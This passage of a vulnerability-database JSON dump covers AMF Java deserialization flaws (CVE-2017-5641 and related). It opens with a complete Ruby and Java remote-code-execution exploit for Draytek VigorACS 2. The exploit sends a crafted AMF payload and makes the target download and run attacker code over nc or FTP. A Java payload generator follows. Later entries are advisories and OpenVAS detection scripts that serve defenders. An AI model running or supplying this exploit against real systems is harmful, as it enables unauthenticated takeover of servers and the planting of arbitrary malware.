generateUnicastRef(String host, int port) {\r\n java.rmi.server.ObjID objId = new java.rmi.server.ObjID();\r\n sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);\r\n sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);\r\n return new sun.rmi.server.UnicastRef(liveRef);\r\n }\r\n\r\n public static byte[] serialize(Object data) throws IOException {\r\n MessageBody body = new MessageBody();\r\n body.setData(data);\r\n\r\n ActionMessage message = new ActionMessage();\r\n message.addBody(body);\r\n\r\n ByteArrayOutputStream out = new ByteArrayOutputStream();\r\n\r\n AmfMessageSerializer serializer = new AmfMessageSerializer();\r\n serializer.initialize(SerializationContext.getSerializationContext(), out, null);\r\n serializer.writeMessage(message);\r\n\r\n return out.toByteArray();\r\n }\r\n}\r\n```\r\n\r\nacsPwn.rb\r\n```\r\n#!/usr/bin/ruby\r\n\r\n=begin\r\n===\r\nacsFlex.jar:\r\n\r\nimport flex.messaging.io.amf.MessageBody;\r\nimport flex.messaging.io.amf.ActionMessage;\r\nimport flex.messaging.io.SerializationContext;\r\nimport flex.messaging.io.amf.AmfMessageSerializer;\r\nimport java.io.*;\r\n\r\npublic class ACSFlex {\r\n public static void main(String[] args) {\r\n Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));\r\n // serialize object to AMF message\r\n try {\r\n byte[] amf = new byte[0];\r\n amf = serialize((unicastRef));\r\n DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));\r\n os.write(amf);\r\n System.out.println(\"Done, payload written to \" + args[2]);\r\n } catch (IOException e) {\r\n e.printStackTrace();\r\n }\r\n }\r\n\r\n public static Object generateUnicastRef(String host, int port) {\r\n java.rmi.server.ObjID objId = new java.rmi.server.ObjID();\r\n sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);\r\n sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);\r\n return new sun.rmi.server.UnicastRef(liveRef);\r\n }\r\n\r\n public static byte[] serialize(Object data) throws IOException {\r\n MessageBody body = new MessageBody();\r\n body.setData(data);\r\n\r\n ActionMessage message = new ActionMessage();\r\n message.addBody(body);\r\n\r\n ByteArrayOutputStream out = new ByteArrayOutputStream();\r\n\r\n AmfMessageSerializer serializer = new AmfMessageSerializer();\r\n serializer.initialize(SerializationContext.getSerializationContext(), out, null);\r\n serializer.writeMessage(message);\r\n\r\n return out.toByteArray();\r\n }\r\n}\r\n===\r\nysoserial.jar:\r\n- Use the multiarg branch of https://github.com/frohoff/ysoserial\r\n- Or patch ysoserial with CommonsCollections5Chained and CommonsCollections6Chain from https://github.com/frohoff/ysoserial/issues/71\r\n===\r\n=end\r\n\r\nrequire 'ftpd'\r\nrequire 'tmpdir'\r\nrequire 'net/http'\r\nrequire 'uri'\r\n\r\nclass String\r\n\tdef black; \"\\e[30m#{self}\\e[0m\" end\r\n\tdef red; \"\\e[31m#{self}\\e[0m\" end\r\n\tdef green; \"\\e[32m#{self}\\e[0m\" end\r\n\tdef brown; \"\\e[33m#{self}\\e[0m\" end\r\n\tdef blue; \"\\e[34m#{self}\\e[0m\" end\r\n\tdef magenta; \"\\e[35m#{self}\\e[0m\" end\r\n\tdef cyan; \"\\e[36m#{self}\\e[0m\" end\r\n\tdef gray; \"\\e[37m#{self}\\e[0m\" end\r\n\r\n\tdef bg_black; \"\\e[40m#{self}\\e[0m\" end\r\n\tdef bg_red; \"\\e[41m#{self}\\e[0m\" end\r\n\tdef bg_green; \"\\e[42m#{self}\\e[0m\" end\r\n\tdef bg_brown; \"\\e[43m#{self}\\e[0m\" end\r\n\tdef bg_blue; \"\\e[44m#{self}\\e[0m\" end\r\n\tdef bg_magenta; \"\\e[45m#{self}\\e[0m\" end\r\n\tdef bg_cyan; \"\\e[46m#{self}\\e[0m\" end\r\n\tdef bg_gray; \"\\e[47m#{self}\\e[0m\" end\r\n\r\n\tdef bold; \"\\e[1m#{self}\\e[22m\" end\r\n\tdef italic; \"\\e[3m#{self}\\e[23m\" end\r\n\tdef underline; \"\\e[4m#{self}\\e[24m\" end\r\n\tdef blink; \"\\e[5m#{self}\\e[25m\" end\r\n\tdef reverse_color; \"\\e[7m#{self}\\e[27m\" end\r\nend\r\n\r\n\r\n# FTP server (Windows)\r\nclass Driver\r\n\tdef initialize(temp_dir)\r\n\t\t@temp_dir = temp_dir\r\n\tend\r\n\r\n\tdef authenticate(user, password)\r\n\t\t# actually the client hasn't downloaded it yet, just logged in, but whatever\r\n\t\tputs '[+] Payload has been downloaded, wait for execution!'.green.bold\r\n\t\ttrue\r\n\tend\r\n\r\n\tdef file_system(user)\r\n\t\tFtpd::DiskFileSystem.new(@temp_dir)\r\n\tend\r\nend\r\n\r\ndef ftp_start (temp_dir, lhost, port)\r\n\tdriver = Driver.new(temp_dir)\r\n server = Ftpd::FtpServer.new(driver)\r\n\tserver.interface = lhost\r\n server.port = port \r\n server.start\r\nend\r\n\r\n\r\ndef tcp_start (payload, port)\r\n\tpl = File.binread(payload)\r\n\tserver = TCPServer.new port\r\n\tloop do\r\n\t\tThread.start(server.accept) do |client|\r\n\t\tclient.write(pl)\r\n\t\tclient.close\r\n\t\tputs \"[+] Payload has been downloaded, wait for execution!\".green.bold\r\n\t\tend\r\n\tend\r\nend\r\n\r\nputs \"\"\r\nputs \"Draytek VigorACS 2 unauthenticated remote code execution (unsafe Java AMF deserialization)\".cyan.bold\r\nputs \"CVE-TODO\".cyan.bold\r\nputs \"Tested on version 2.2.1 for Windows and Linux, earlier versions are likely vulnerable\".cyan.bold\r\nputs \"By Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security\".blue.bold\r\nputs \"\"\r\n\r\nif (ARGV.length < 5 || (ARGV[3] != \"Linux\" && ARGV[3] != \"Windows\") || !File.file?(ARGV[4]))\r\n\tputs \"Usage: ./acsPwn.rb <rhost> <rport> <lhost> <Windows|Linux> <payload_path> [ssl]\".bold\r\n\tputs \"\trhost:\\t\\t\\tDraytek Vigor ACS server host\"\r\n\tputs \"\trport:\\t\\t\\tDraytek Vigor ACS server port\"\r\n\tputs \"\tlhost:\\t\\t\\tyour IP address\"\r\n\tputs \"\tWindows|Linux:\\t\\ttarget type\"\r\n\tputs \"\tpayload_path:\\t\\tPath to the payload that is going to be executed in the Vigor server\"\r\n\tputs \"\tssl:\\t\\t\\tConnects to Vigor server using SSL (by default uses plain HTTP)\"\r\n\tputs \"\"\r\n\tputs \"NOTES:\\tThis exploit requires the ftpd gem installed and the java executable in the PATH.\" \r\n\tputs \"\\tThe included ysoserial.jar (patched for multiarg) and the included acsFlex.jar must be in the current directory.\"\r\n\tputs \"\\tTwo random TCP ports in the range 10000-65535 are used to receive connections from the target.\"\r\n\tputs \"\"\r\n\texit(-1)\r\nend\r\n\r\n# we can use ysoserial's CommonsCollections5 or CommonsCollections6 exploit chain\r\nYSOSERIAL = \"ysoserial-patched.jar ysoserial.exploit.JRMPListener JRMP_PORT CommonsCollections6Chained \"\r\nWINDOWS_CMD = %{'cmd.exe /c @echo open SERVER PORT>script.txt&@echo binary>>script.txt&@echo get /PAYLOAD>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start PAYLOAD'}\r\nLINUX_CMD = %{\\'nc -w 2 SERVER PORT > /tmp/PAYLOAD; chmod +x /tmp/PAYLOAD; /tmp/PAYLOAD\\'}\r\n\r\nrhost = ARGV[0]\r\nrport = ARGV[1]\r\nlhost = ARGV[2].dup.force_encoding('ASCII')\r\nos = ARGV[3]\r\npayload_path = ARGV[4]\r\npayload_name = File.basename(ARGV[4])\r\nif ARGV.length > 5 && ARGV[5] == 'ssl'\r\n\tssl = true\r\nelse\r\n\tssl = false\r\nend\r\n\r\nDir.mktmpdir { |temp_dir|\r\n\tserver_port = rand(10000..65535)\r\n\tFileUtils.cp(payload_path, temp_dir)\r\n\r\n\tputs \"[+] Picked port #{server_port} for the #{(os == 'Windows' ? 'FTP' : 'TCP')} server\".cyan.bold\r\n\r\n\t# step 1: start the TCP or FTP server\r\n\tif os == 'Windows'\r\n\t\tftp_start(temp_dir, lhost, server_port)\r\n\telse\r\n\t\tt = Thread.new{tcp_start(payload_path, server_port)}\r\n\tend\r\n\t\r\n\t# step 2: create the AMF payload\r\n\tputs \"[+] Creating AMF payload...\".green.bold\r\n\tjrmp_port = rand(10000..65535)\r\n\t\r\n\tamf_file = temp_dir + \"/payload.ser\"\r\n\tsystem(\"java -jar acsFlex.jar #{lhost} #{jrmp_port} #{amf_file}\")\r\n\tamf_payload = File.binread(amf_file)\r\n \r\n\t# step 3: start the ysoserial JRMP listener\r\n\tputs \"[+] Picked port #{jrmp_port} for the JRMP server\".cyan.bold\r\n\t\r\n\t# build the command line argument that will be executed by the server\r\n\tcmd = (os == 'Windows' ? \"java \" : \"java -Dysoserial.prefix=\\'/bin/sh -c\\' \")\r\n\tcmd += \"-cp #{YSOSERIAL.gsub('JRMP_PORT', jrmp_port.to_s)}\"\r\n\tcmd_final = (os == 'Windows' ? WINDOWS_CMD : LINUX_CMD).gsub(\"SERVER\", lhost).gsub(\"PORT\", server_port.to_s).gsub(\"PAYLOAD\", payload_name)\r\n\tputs \"[+] Sending command #{cmd_final}\".green.bold\r\n\t\r\n\tjrmp_pid = spawn((cmd + cmd_final))\r\n\tsleep 5\r\n\tProcess.detach(jrmp_pid)\r\n\r\n\t# step 4: fire the payload!\r\n\turi = URI.parse(\"http#{ssl ? 's': ''}://#{rhost}:#{rport}\")\r\n\t\r\n\tNet::HTTP.start(uri.host, uri.port, (ssl ? {:use_ssl => true, :verify_mode => OpenSSL::SSL::VERIFY_NONE } : {})) do |http|\r\n\t\thttp.post('/ACSServer/messagebroker/amf', amf_payload)\r\n\tend\r\n\r\n\tputs \"[+] AMF payload sent, waiting 15 seconds for payload download...\".green.bold\r\n\tsleep 15\r\n\tProcess.kill(\"HUP\", jrmp_pid)\r\n\tif t\r\n\t\tt.terminate\r\n\tend\r\n\tputs \"[*] Payload should have executed by now, exiting!\".bold\r\n}\r\nexit 0\r\n```", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "seebug", "title": "Vigor ACS Unsafe Flex AMF Java Object Deserialization(CVE-2017-5641)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5641"], "modified": "2018-04-25T00:00:00", "id": "SSV:97242", "href": "https://www.seebug.org/vuldb/ssvid-97242", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:00:07", "description": "Details reference: https://codewhitesec.blogspot.kr/2017/04/amf.html\n\nSome Java implementations of AMF3 deserializers may allow instantiation of arbitrary classes via their public parameter-less constructor and subsequently call arbitrary Java Beans setter methods. The ability to exploit this vulnerability depends on the availability of classes in the class path that make use of deserialization. A remote attacker with the ability to spoof or control information may be able to send serialized Java objects with pre-set properties that result in arbitrary code execution when deserialized.\n\nThe reporter has identified the following products and versions as being affected, and CVE IDS have been assigned as follows: \\- Flamingo amf-serializer by Exadel, version 2.2.0 - CVE-2017-3202 \\- Flex BlazeDS , versions 4.6.0.23207 and 4.7.2 - CVE-2017-5641 \\- GraniteDS, version 3.1.1. GA - CVE-2017-3200\n\nProducts using these libraries may also be impacted.\n", "cvss3": {}, "published": "2017-04-06T00:00:00", "type": "seebug", "title": "AMF3 Java implementations Improper Control of Dynamically-Managed Code Resources", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-3200", "CVE-2017-3202", "CVE-2017-5641"], "modified": "2017-04-06T00:00:00", "id": "SSV:92914", "href": "https://www.seebug.org/vuldb/ssvid-92914", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-19T12:00:08", "description": "Details reference: https://codewhitesec.blogspot.kr/2017/04/amf.html\n\nSome Java implementations of AMF3 deserializers derive class instances from java. io. Externalizable rather than the AMF3 specification's recommendation of a flash. utils. IExternalizable. A remote attacker with the ability to spoof or control an RMI server connection may be able to send serialized Java objects that execute arbitrary code when deserialized.\n\nThe reporter has identified the following products and versions as being affected, and CVE IDS have been assigned as follows: \\- Atlassian JIRA, versions from 4.2.4 prior to version 6.3.0 - CVE-2017-5983 for \\- Flamingo amf-serializer by Exadel, version 2.2.0 - CVE-2017-3201 \\- GraniteDS, version 3.1.1. GA - CVE-2017-3199 \\- Pivotal/Spring spring-flex - CVE-2017-3203 \\- WebORB for Java by Midnight Coders, version 5.1.1.0 - CVE-2017-3207\n\nProducts using these libraries may also be impacted.\n", "cvss3": {}, "published": "2017-04-06T00:00:00", "type": "seebug", "title": "AMF3 Java implementations deserialization Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-3199", "CVE-2017-3201", "CVE-2017-3203", "CVE-2017-3207", "CVE-2017-5983"], "modified": "2017-04-06T00:00:00", "id": "SSV:92913", "href": "https://www.seebug.org/vuldb/ssvid-92913", "sourceData": "\n import java.io.ByteArrayInputStream;\r\nimport java.io.ByteArrayOutputStream;\r\nimport java.io.IOException;\r\nimport java.util.Arrays;\r\n\r\nimport flex.messaging.io.SerializationContext;\r\nimport flex.messaging.io.amf.ActionContext;\r\nimport flex.messaging.io.amf.ActionMessage;\r\nimport flex.messaging.io.amf.AmfMessageDeserializer;\r\nimport flex.messaging.io.amf.AmfMessageSerializer;\r\nimport flex.messaging.io.amf.MessageBody;\r\n\r\npublic class Amf3ExternalizableUnicastRef {\r\n\r\n\tpublic static void main(String[] args) throws IOException, ClassNotFoundException {\r\n\t\tif (args.length < 2 || (args.length == 3 && !args[0].equals(\"-d\"))) {\r\n\t\t\tSystem.err.println(\"usage: java -jar \" + Amf3ExternalizableUnicastRef.class.getSimpleName() + \".jar [-d] <host> <port>\");\r\n\t\t\treturn;\r\n\t\t}\r\n\t\tboolean doDeserialize = false;\r\n\t\tif (args.length == 3) {\r\n\t\t\tdoDeserialize = true;\r\n\t\t\targs = Arrays.copyOfRange(args, 1, args.length);\r\n\t\t}\r\n\r\n\t\t// generate the UnicastRef object\r\n\t\tObject unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));\r\n\r\n\t\t// serialize object to AMF message\r\n\t\tbyte[] amf = serialize(unicastRef);\r\n\r\n\t\t// deserialize AMF message\r\n\t\tif (doDeserialize) {\r\n\t\t\tdeserialize(amf);\r\n\t\t} else {\r\n\t\t\tSystem.out.write(amf);\r\n\t\t}\r\n\t}\r\n\r\n\tpublic static Object generateUnicastRef(String host, int port) {\r\n\t\tjava.rmi.server.ObjID objId = new java.rmi.server.ObjID();\r\n\t\tsun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);\r\n\t\tsun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);\r\n\t\treturn new sun.rmi.server.UnicastRef(liveRef);\r\n\t}\r\n\r\n\tpublic static byte[] serialize(Object data) throws IOException {\r\n\t\tMessageBody body = new MessageBody();\r\n\t\tbody.setData(data);\r\n\r\n\t\tActionMessage message = new ActionMessage();\r\n\t\tmessage.addBody(body);\r\n\r\n\t\tByteArrayOutputStream out = new ByteArrayOutputStream();\r\n\r\n\t\tAmfMessageSerializer serializer = new AmfMessageSerializer();\r\n\t\tserializer.initialize(SerializationContext.getSerializationContext(), out, null);\r\n\t\tserializer.writeMessage(message);\r\n\t\t\r\n\t\treturn out.toByteArray();\r\n\t}\r\n\r\n\tpublic static void deserialize(byte[] amf) throws ClassNotFoundException, IOException {\r\n\t\tByteArrayInputStream in = new ByteArrayInputStream(amf);\r\n\r\n\t\tAmfMessageDeserializer deserializer = new AmfMessageDeserializer();\r\n\t\tdeserializer.initialize(SerializationContext.getSerializationContext(), in, null);\r\n\t\tdeserializer.readMessage(new ActionMessage(), new ActionContext());\r\n\t}\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92913", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-12-06T16:32:48", "description": "Remote code execution vulnerability via BlazeDS", "cvss3": {}, "published": "2017-04-18T00:00:00", "type": "openvas", "title": "VMSA-2017-0007: VMware vCenter Server updates resolve a remote code execution vulnerability via BlazeDS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5641"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310140254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140254", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2017-0007: VMware vCenter Server updates resolve a remote code execution vulnerability via BlazeDS\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140254\");\n script_cve_id(\"CVE-2017-5641\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2017-0007: VMware vCenter Server updates resolve a remote code execution vulnerability via BlazeDS\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0007.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"VMware vCenter Server contains a remote code execution vulnerability due to the use of BlazeDS to process AMF3 messages. This issue may be exploited to execute arbitrary code when deserializing an untrusted Java object.\");\n\n script_tag(name:\"solution\", value:\"See vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Remote code execution vulnerability via BlazeDS\");\n\n script_tag(name:\"affected\", value:\"vCenter 6.5 and 6.0\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 11:03:22 +0200 (Tue, 18 Apr 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) <= int( 5318198 ) ) fix = '6.0 3b';\n\nif( vcenter_version == \"6.5.0\" )\n if ( int( vcenter_build ) < int( 5318112 ) ) fix = '6.5.0c';\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:52", "description": "The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0\nimproperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read\narbitrary files, or cause a denial of service via a crafted serialized Java object.", "cvss3": {}, "published": "2017-04-18T00:00:00", "type": "openvas", "title": "Atlassian JIRA XXE / Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5983"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106758", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106758", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_jira_rce_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian JIRA XXE / Deserialization Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:atlassian:jira';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106758\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 10:31:18 +0200 (Tue, 18 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-5983\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian JIRA XXE / Deserialization Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_atlassian_jira_detect.nasl\");\n script_mandatory_keys(\"atlassian_jira/installed\");\n\n script_tag(name:\"summary\", value:\"The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0\nimproperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read\narbitrary files, or cause a denial of service via a crafted serialized Java object.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An anonymous user can perform multiple attacks on a vulnerable JIRA\ninstance that could cause remote code execution, the disclosure of private files or execute a denial of service\nattack against the JIRA server. This vulnerability is caused by the way an XML parser and deserializer was used\nin JIRA.\");\n\n script_tag(name:\"affected\", value:\"Atlassian JIRA 4.2.4 until 6.2.7.\");\n\n script_tag(name:\"solution\", value:\"Update to version 6.3.0 or later. Please keep in mind that JIRA Server 6.4\nreaches its Atlassian Support end of life date on March 17, 2017, so it's recommended to upgrade to a version of\nJIRA Software (7.0 or later).\");\n\n script_xref(name:\"URL\", value:\"https://confluence.atlassian.com/jira/jira-security-advisory-2017-03-09-879243455.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.2.4\", test_version2: \"6.2.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.3.0\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-07-25T22:20:23", "description": "Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:02:10", "type": "osv", "title": "Apache Flex BlazeDS unsafe deserialization", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2023-07-25T22:19:14", "id": "OSV:GHSA-W8V7-PRHW-XJPW", "href": "https://osv.dev/vulnerability/GHSA-w8v7-prhw-xjpw", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-04-19T20:11:58", "description": "A remote code execution vulnerability exists in Apache Flex BlazeDS. This vulnerability is due to deserialization of untrusted data. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted file to the target system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-17T00:00:00", "type": "checkpoint_advisories", "title": "Apache Flex AMF BlazeDS Java Object Deserialization Remote Code Execution (CVE-2017-5641)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5641"], "modified": "2019-04-03T00:00:00", "id": "CPAI-2019-0387", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2021-06-08T19:00:36", "description": "||Affected Versions||\r\n|4.2.4 <= version < 6.3.0|\r\n\r\nAn anonymous user can perform multiple attacks on a vulnerable JIRA instance that could cause remote code execution, the disclosure of private files or execute a denial of service attack against the JIRA server. This vulnerability is caused by the way an XML parser and deserializer was used in JIRA.\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/x/vzBoN].", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-13T04:43:51", "type": "atlassian", "title": "Multiple Vulnerabilities in JIRA Workflow Servlet", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5983"], "modified": "2017-03-28T01:41:20", "id": "ATLASSIAN:JRA-64077", "href": "https://jira.atlassian.com/browse/JRA-64077", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-28T14:40:39", "description": "||Affected Versions||\r\n|4.2.4 <= version < 6.3.0|\r\n\r\nAn anonymous user can perform multiple attacks on a vulnerable JIRA instance that could cause remote code execution, the disclosure of private files or execute a denial of service attack against the JIRA server. This vulnerability is caused by the way an XML parser and deserializer was used in JIRA.\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/x/vzBoN].", 